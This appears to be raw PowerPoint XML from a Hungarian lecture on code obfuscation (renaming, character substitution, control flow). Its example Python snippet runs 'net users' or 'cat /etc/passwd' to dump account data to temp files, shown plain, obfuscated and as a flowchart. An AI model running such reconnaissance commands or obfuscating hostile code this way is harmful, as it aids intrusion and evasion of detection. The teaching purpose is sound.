                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="116" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="117" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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P spid="21" grpId="0"/>
      <p:bldP spid="2" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="1" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="36" grpId="0" animBg="1"/>
      <p:bldP spid="38" grpId="0" animBg="1"/>
      <p:bldP spid="40" grpId="0" animBg="1"/>
      <p:bldP spid="56" grpId="0" animBg="1"/>
      <p:bldP spid="64" grpId="0" animBg="1"/>
      <p:bldP spid="3"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E7A70C21-0C2D-48D1-B77D-596C1F38F52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785360" y="605176"/>
            <a:ext cx="6523988" cy="456863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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r"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OBFUSZKÁLÁSI TECHNIKÁK, RÉTEGEK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053A3859-1B85-4547-A8C1-DC39E96F7350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742949" y="1363983"/>
            <a:ext cx="10566399" cy="369565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>átnevezés/keresés és csere</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A936F6-6200-46E2-B5A7-259A341B6274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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zövegdoboz 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A62FAFEE-15E6-40CE-9899-7B71C9E604AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2071368" y="1842610"/>
            <a:ext cx="7909560" cy="1477328"/>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hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>osplat=platform.system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if osplat=="Windows":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	os.system('cmd /C net users &gt; "C:\Windows\Temp\usr.txt"')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	os.system('cat /etc/passwd &gt; /tmp/pwd.txt')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Szövegdoboz 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{957EE4FA-7894-47FA-A572-445B4914B8F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2071368" y="4616854"/>
            <a:ext cx="7909560" cy="1754326"/>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hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ospl4t=pl4tform.syst[ˇ82]m()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if_ospl4t=="Windows":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>____os.syst[ˇ82]m('cmd_/C_n[ˇ82]t_us[ˇ82]rs_&gt;_"C:\Windows\T[ˇ82]mp\usr.txt"')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[ˇ82]ls[ˇ82]:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>____os.syst[ˇ82]m('c4t_/[ˇ82]tc/p4sswd_&gt;_/tmp/pwd.txt')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Szövegdoboz 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7847F341-B32E-4540-8A35-9262F948C729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4625023" y="3501494"/>
            <a:ext cx="2941953" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a 		---&gt;	4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" "		---&gt;	"_"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e 		---&gt;	[˘82]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278126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P spid="9"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E7A70C21-0C2D-48D1-B77D-596C1F38F52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785360" y="605176"/>
            <a:ext cx="6523988" cy="456863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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r"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OBFUSZKÁLÁSI TECHNIKÁK, RÉTEGEK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053A3859-1B85-4547-A8C1-DC39E96F7350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742949" y="1363983"/>
            <a:ext cx="10566399" cy="436239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CONTROL FLOW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A936F6-6200-46E2-B5A7-259A341B6274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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zövegdoboz 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A62FAFEE-15E6-40CE-9899-7B71C9E604AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075688" y="1842284"/>
            <a:ext cx="7909560" cy="1477328"/>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hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>osplat=platform.system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if osplat=="Windows":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	os.system('cmd /C net users &gt; "C:\Windows\Temp\usr.txt"')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	os.system('cat /etc/passwd &gt; /tmp/pwd.txt')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Csoportba foglalás 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD41C633-E32B-402F-8CE6-CF86FAFB0349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3281115" y="3894776"/>
            <a:ext cx="5490066" cy="1998342"/>
            <a:chOff x="3125299" y="3580451"/>
            <a:chExt cx="5490066" cy="1998342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Egyenes összekötő nyíllal 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EA52D4-263F-4B8C-B847-491397273EBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="5" idx="4"/>
              <a:endCxn id="4" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867401" y="4075751"/>
              <a:ext cx="0" cy="29432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4" name="Egyenes összekötő nyíllal 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C227B700-783A-456A-83CD-533BB90D93EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="4" idx="3"/>
              <a:endCxn id="11" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6657976" y="4712976"/>
              <a:ext cx="271464" cy="52291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Egyenes összekötő nyíllal 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4B6DAAB-C994-470E-AC3A-C8A4A93553F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="4" idx="1"/>
              <a:endCxn id="6" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4811224" y="4712976"/>
              <a:ext cx="265602" cy="52291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 name="Folyamatábra: Döntés 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{007B049B-EE68-47C1-A500-3E4F995F1C7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5076826" y="4370076"/>
              <a:ext cx="1581150" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartDecis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hu-HU">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ha</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Folyamatábra: Adatok 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5662868D-5213-48E6-9D01-78FB8AC70B8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5076826" y="3580451"/>
              <a:ext cx="1581150" cy="495300"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartInputOutp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hu-HU">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>osplat</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Folyamatábra: Feldolgozás 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{327E3868-CD64-4264-8589-A31166C73F6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3125299" y="4892993"/>
              <a:ext cx="1685925" cy="685800"/>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hu-HU">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>win temp:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="hu-HU">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>usr.txt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Folyamatábra: Feldolgozás 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{117ECEE8-42A3-4DEF-A8FF-79F143C8A38F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6929440" y="4892993"/>
              <a:ext cx="1685925" cy="685800"/>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hu-HU">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>linux tmp:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="hu-HU">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pwd.txt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387555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E7A70C21-0C2D-48D1-B77D-596C1F38F52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785360" y="605176"/>
            <a:ext cx="6523988" cy="456863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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r"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OBFUSZKÁLÁSI TECHNIKÁK, RÉTEGEK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053A3859-1B85-4547-A8C1-DC39E96F7350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742949" y="1363983"/>
            <a:ext cx="10566399" cy="436239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CONTROL FLOW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A936F6-6200-46E2-B5A7-259A341B6274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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Összekötő: görbe 242">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85C05662-2EA5-477D-BA06-7BB38C6BF63F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="127" idx="2"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4068016" y="3113812"/>
            <a:ext cx="1353811" cy="2366348"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8912"/>
              <a:gd name="adj2" fmla="val 43916"/>
              <a:gd name="adj3" fmla="val 116900"/>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222" name="Csoportba foglalás 221">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FEB2438-4CEC-49D8-9902-1093A8AF0B42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="964795" y="1828797"/>
            <a:ext cx="10262409" cy="4320014"/>
            <a:chOff x="964795" y="1828797"/>
            <a:chExt cx="10262409" cy="4320014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="70" name="Egyenes összekötő nyíllal 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{613BD748-0F24-4C14-B10D-80C878B8DCD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="23" idx="1"/>
              <a:endCxn id="22" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="5323926" y="4755772"/>
              <a:ext cx="1235400" cy="9314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8" name="Egyenes összekötő nyíllal 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EF8830A-4006-4C62-95F8-84E3A0428EE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="9" idx="3"/>
              <a:endCxn id="13" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5177269" y="2010010"/>
              <a:ext cx="357306" cy="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2" name="Egyenes összekötő nyíllal 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C292D2B-9870-49BE-A486-3C7C9494D849}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="9" idx="2"/>
              <a:endCxn id="7" idx="3"/>
